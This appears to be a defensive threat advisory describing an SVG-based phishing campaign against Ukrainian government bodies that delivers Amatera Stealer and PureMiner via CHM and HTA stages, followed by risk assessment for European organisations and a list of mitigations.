This threat describes a sophisticated phishing campaign targeting Ukrainian government entities that leverages malicious SVG (Scalable Vector Graphics) files as the initial infection vector. The attack begins with emails containing SVG attachments, which when opened, redirect victims to a malicious download site. From there, a CHM (Compiled HTML Help) file is downloaded and executed, which in turn runs a remote HTA (HTML Application) loader. This multi-stage infection chain ultimately delivers two distinct malware payloads: Amatera Stealer and PureMiner. Amatera Stealer is an information-stealing malware that harvests a wide range of sensitive data from infected systems. This includes user credentials, system and application data, browser files, and cryptocurrency wallet information, posing a significant risk to confidentiality and privacy. PureMiner is a cryptomining malware that collects hardware details and monitors system activity to optimize the deployment of CPU or GPU mining modules, thereby degrading system performance and increasing operational costs. The campaign employs advanced evasion techniques such as fileless malware delivery and multiple infection stages to avoid detection by traditional antivirus and endpoint security solutions. The use of SVG files as a phishing vector is notable because SVGs are often overlooked as potentially malicious, allowing the attackers to bypass some email security filters. The combination of credential theft and cryptomining indicates a dual-purpose campaign aimed at both espionage and financial gain. Indicators of compromise include numerous file hashes and malicious domains associated with the campaign, which can be used for detection and blocking. The attack chain leverages known tactics such as phishing (T1566), execution through HTA files (T1218.001), fileless techniques (T1055), and persistence mechanisms (T1547), highlighting the threat actor's sophistication and operational security.

For European organizations, especially those with diplomatic, governmental, or strategic ties to Ukraine, this threat poses a significant risk. The credential theft capabilities of Amatera Stealer could lead to unauthorized access to sensitive systems, data breaches, and espionage activities. This is particularly concerning for entities involved in political, defense, or critical infrastructure sectors. The cryptomining activity from PureMiner can degrade system performance, increase energy consumption, and potentially cause hardware damage, impacting operational continuity. Even organizations not directly targeted may be at risk if the phishing campaign expands or if the malware spreads laterally. The use of fileless techniques complicates detection and remediation, increasing the likelihood of prolonged undetected presence within networks. Additionally, the campaign’s focus on government entities suggests a potential for geopolitical motivations, which could lead to targeted attacks on European institutions supporting Ukraine or involved in related geopolitical matters.

1. Enhance email security by configuring advanced filtering to detect and block SVG attachments and suspicious CHM or HTA files. Implement sandboxing to analyze attachments before delivery. 2. Educate users on the risks of opening unexpected or suspicious SVG files and attachments, emphasizing verification of sender authenticity. 3. Deploy endpoint detection and response (EDR) solutions capable of identifying fileless malware behaviors and multi-stage infection chains. 4. Monitor network traffic for connections to known malicious domains listed in the indicators and block them at the firewall or proxy level. 5. Implement strict application whitelisting to prevent execution of unauthorized CHM and HTA files. 6. Regularly audit and secure credential storage and access controls to limit the impact of stolen credentials. 7. Use multi-factor authentication (MFA) extensively to reduce the risk of compromised credentials leading to unauthorized access. 8. Continuously update and patch systems to minimize exploitation opportunities, even though this campaign does not exploit a specific CVE. 9. Conduct threat hunting exercises focusing on signs of cryptomining activity and unusual system resource usage. 10. Establish incident response plans specifically addressing multi-stage phishing and fileless malware attacks.